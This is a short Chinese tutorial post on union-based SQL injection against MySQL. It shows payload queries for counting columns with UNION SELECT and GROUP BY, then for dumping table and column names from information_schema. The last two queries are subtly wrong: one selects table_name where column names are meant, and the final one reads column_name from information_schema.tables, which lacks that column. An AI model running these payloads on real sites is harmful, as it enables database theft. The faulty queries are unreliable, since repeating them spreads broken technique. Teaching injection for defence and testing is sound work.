sqli注入原理浅析

     当发现sql注入点之后，如何进行sql注入呢？

    要想成功sqli注入，需要以下3步：

    1. 猜解存在注入点的sqli语句查询时，查询了几列

    2. 查找到所有的表名字和列名字

   3. 根据表明和列名，进行注入，拖出数据库的数据

     为什么需要猜解查询了几列呢？我们通过如下例子来说明。假设某个注入点的sql查询条件是如下：

SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4;

    那么如果我们想通过这个注入点，使用union语句成功注入，那么条件就是要知道这个查询语句查询了几列，否则union语句就不能成功执行

    如何猜解注入点，查询了几列呢？

    我们可以使用如下方法：

    SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 union select 1   失败

    SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 union select 1, 2  失败

    SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 union select 1, 2, 3  成功，返回结果跟执行以上两条sqli语句不一样

    (以上方法是针对mysql数据库的，对于union字段前后语句必须是相同类型的查询来说，需要使用union select null, null, null from dual)

    或者使用如下方法：

      SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 group by 1   成功

      SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 group by 2  成功

      SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 group by  3  成功

      SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 group by  4 失败

    在mysql数据库中，表信息和列信息放在了information_schema数据库中，可通过以下方法dump出数据库中的表和列：

    SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 UNION SELECT 1,table_name,3 FROM information_schema.tables

   SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 UNION SELECT 1,table_name,3 FROM information_schema.columns

    把对应的表和列连接起来：

    SELECT column1, column2, column3 FROM table1 WHERE column4='user' AND column5=3 AND column6=4 UNION SELECT 1,concat(table_name, ':', column_name), 3 FROM information_schema.tables